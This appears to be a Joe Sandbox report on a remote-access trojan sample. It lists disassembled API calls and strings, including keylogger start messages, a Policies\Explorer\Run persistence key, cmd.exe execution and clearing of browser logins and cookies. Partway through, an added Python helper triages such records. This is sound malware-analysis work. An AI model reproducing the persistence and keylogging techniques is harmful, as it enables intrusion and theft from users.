                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                    • String ID: /sort "Visit Time" /stext "$8>G
                                                    • API String ID: 368326130-2663660666
                                                    • Opcode ID: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                    • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                    • Opcode Fuzzy Hash: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                    • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                    APIs
                                                    • _free.LIBCMT ref: 004481ED
                                                    • _free.LIBCMT ref: 00448243
                                                      • Part of subcall function 0044801F: _free.LIBCMT ref: 00448077
                                                      • Part of subcall function 0044801F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                      • Part of subcall function 0044801F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                      • Part of subcall function 0044801F: WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                    • String ID: Zb1Y/
                                                    • API String ID: 314583886-3232713500
                                                    • Opcode ID: a321ea17a487838045db2ce858005c675a897f4104d35ab4fa77d22e9e1a69bf
                                                    • Instruction ID: 0387677de0d9422e32f730e2557b1f6991b12741dc4ef5b7eb5f60d3584a26b6
                                                    • Opcode Fuzzy Hash: a321ea17a487838045db2ce858005c675a897f4104d35ab4fa77d22e9e1a69bf
                                                    • Instruction Fuzzy Hash: 37213E3180012897E73197658C41DEF777CDB42374F2102DFE899A3181DF785D82859D
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                    • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                    • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$LocalTimewsprintf
                                                    • String ID: Offline Keylogger Started
                                                    • API String ID: 465354869-4114347211
                                                    • Opcode ID: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                    • Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
                                                    • Opcode Fuzzy Hash: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
                                                    • Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
                                                    APIs
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                    • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                    • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                    • String ID: Online Keylogger Started
                                                    • API String ID: 112202259-1258561607
                                                    • Opcode ID: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                    • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                                    • Opcode Fuzzy Hash: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
                                                    • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                                    • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                                    • __dosmaperr.LIBCMT ref: 0044AB0E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                    • String ID: `@
                                                    • API String ID: 2583163307-951712118
                                                    • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                    • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                                    • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                    • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00404946
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                    • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                    Strings
                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$EventLocalThreadTime
                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                    • API String ID: 2532271599-1507639952
                                                    • Opcode ID: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                    • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                    • Opcode Fuzzy Hash: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
                                                    • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                    • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                    • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandleObjectSingleWait
                                                    • String ID: Connection Timeout
                                                    • API String ID: 2055531096-499159329
                                                    • Opcode ID: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                    • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                                    • Opcode Fuzzy Hash: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
                                                    • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                                    APIs
                                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,759237E0,?), ref: 004127AD
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,759237E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                    • API String ID: 1818849710-1051519024
                                                    • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                    • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                    • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                    • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                                      • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                    • String ID: bad locale name
                                                    • API String ID: 3628047217-1405518554
                                                    • Opcode ID: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                    • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                                    • Opcode Fuzzy Hash: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
                                                    • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                                    APIs
                                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                    • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                    • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: Control Panel\Desktop
                                                    • API String ID: 1818849710-27424756
                                                    • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                    • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                    • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                    • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
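The two registry records above (the RegCreateKeyW at 0041277F targeting Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ and the RegCreateKeyA at 004126E1 targeting Control Panel\Desktop) show the root key only as the raw HKEY pseudo-handle constant. The helper below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it parses API lines in the exact "• Api.MODULE(args), ref: ADDR" shape used on this page, resolves 80000001/80000002 to HKEY_CURRENT_USER/HKEY_LOCAL_MACHINE, flags writes to well-known autorun keys, pulls out absolute file paths passed to file APIs, and converts the Sleep/WaitForSingleObject hex arguments to milliseconds. The sample records are copied from this section; the AUTORUN_KEYS list, the function names and the Call type are this example's own choices.

```python
"""Triage helper for Joe Sandbox-style API call records (added example, not report code).

Parses lines such as
    • RegCreateKeyW.ADVAPI32(80000002,Software\...\Explorer\Run\,?), ref: 0041277F
and reports registry key creation with the HKEY constant resolved to a hive name,
well-known autorun locations, absolute file paths and Sleep/Wait timeouts.
"""
import re
from dataclasses import dataclass

# HKEY pseudo-handle constants as defined in winreg.h
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}

# Relative key paths that count as persistence locations (assumption: list chosen for this example).
AUTORUN_KEYS = (
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
)

# Matches "• Api.MODULE(arg,arg,...), ref: ADDR", including "Part of subcall function" lines.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


def parse_calls(text):
    """Return one Call per API line; lines without an argument list (e.g. _free.LIBCMT) are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")]
            calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return calls


def hex_arg(arg):
    """Int value of a hex argument like '000000FA'; None for '?', string literals and other non-hex tokens."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def registry_writes(calls):
    """RegCreateKey*/RegOpenKey* calls with the root handle resolved to a hive and autorun keys flagged.

    A subkey that is itself a hex value (e.g. 00000000) means the key name is not recoverable
    from the record, so it is reported verbatim and never flagged as autorun.
    """
    out = []
    for c in calls:
        if not c.api.startswith(("RegCreateKey", "RegOpenKey")):
            continue
        root = hex_arg(c.args[0]) if c.args else None
        hive = HIVES.get(root, c.args[0] if c.args else "?")
        subkey = c.args[1] if len(c.args) > 1 else "?"
        autorun = subkey.rstrip("\\").lower() in AUTORUN_KEYS
        out.append({"ref": c.ref, "hive": hive, "subkey": subkey, "autorun": autorun})
    return out


def dropped_paths(calls):
    """Absolute Windows paths passed to GetModuleFileName*/CreateFile*/CopyFile* (self-copy candidates)."""
    paths = []
    for c in calls:
        if c.api.startswith(("GetModuleFileName", "CreateFile", "CopyFile")):
            paths.extend((c.api, a) for a in c.args if re.match(r"^[A-Za-z]:\\", a))
    return paths


def timeouts_ms(calls):
    """Sleep(dwMilliseconds) and WaitForSingleObject(hHandle, dwMilliseconds) timeouts as ints."""
    out = []
    for c in calls:
        if c.api == "Sleep" and c.args:
            ms = hex_arg(c.args[0])
        elif c.api == "WaitForSingleObject" and len(c.args) > 1:
            ms = hex_arg(c.args[1])
        else:
            continue
        if ms is not None:
            out.append((c.api, c.ref, ms))
    return out


# Sample records copied from the report section above (dump of process 12 at 0x400000).
SAMPLE = r"""
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
• RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,759237E0,?), ref: 004127AD
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe,00000104), ref: 00442724
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
  • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
"""

if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for row in registry_writes(parsed):
        print("REG ", row)
    for api, path in dropped_paths(parsed):
        print("PATH", api, path)
    for api, ref, ms in timeouts_ms(parsed):
        print("WAIT", api, ref, f"{ms} ms")
```

Run against the sample, the helper reports the Policies\Explorer\Run write as HKEY_LOCAL_MACHINE with the autorun flag set (a write under HKLM\Software needs administrative rights, so it pairs with whatever elevation the sample achieved), the Control Panel\Desktop write as an unflagged HKEY_CURRENT_USER key, the self-copy path under AppData\Roaming, and the 250 ms Sleep and 1000 ms WaitForSingleObject timeouts. Paste further "•" lines from the report into SAMPLE, or read a saved copy of the page, to triage the rest of the dump the same way.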
                                                    APIs
                                                    • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocaleValid
                                                    • String ID: IsValidLocaleName$Zb1Y/$z=D
                                                    • API String ID: 1901932003-1659658204
                                                    • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                    • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                    • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                    • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                    APIs
                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateValue
                                                    • String ID: TUF
                                                    • API String ID: 1818849710-3431404234
                                                    • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                    • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                    • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                    • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExecuteShell
                                                    • String ID: /C $cmd.exe$open
                                                    • API String ID: 587946157-3896048727
                                                    • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                    • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                    • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                    • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetCursorInfo$User32.dll
                                                    • API String ID: 1646373207-2714051624
                                                    • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                    • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                    • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                    • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetLastInputInfo$User32.dll
                                                    • API String ID: 2574300362-1519888992
                                                    • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                    • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                    • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                    • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                    • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                    • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                    • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                    • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                    • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                    • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                    • Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
                                                    • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                    • Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784
                                                    APIs
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                    • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 3360349984-0
                                                    • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                    • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                    • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                    • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                    APIs
                                                    Strings
                                                    • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                    • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                    • API String ID: 3472027048-1236744412
                                                    • Opcode ID: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                    • Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
                                                    • Opcode Fuzzy Hash: 39a193d0582b7eb98f903914784aef6be3ac6f15ea21b06dedc6bc4d90296757
                                                    • Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF
                                                    APIs
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
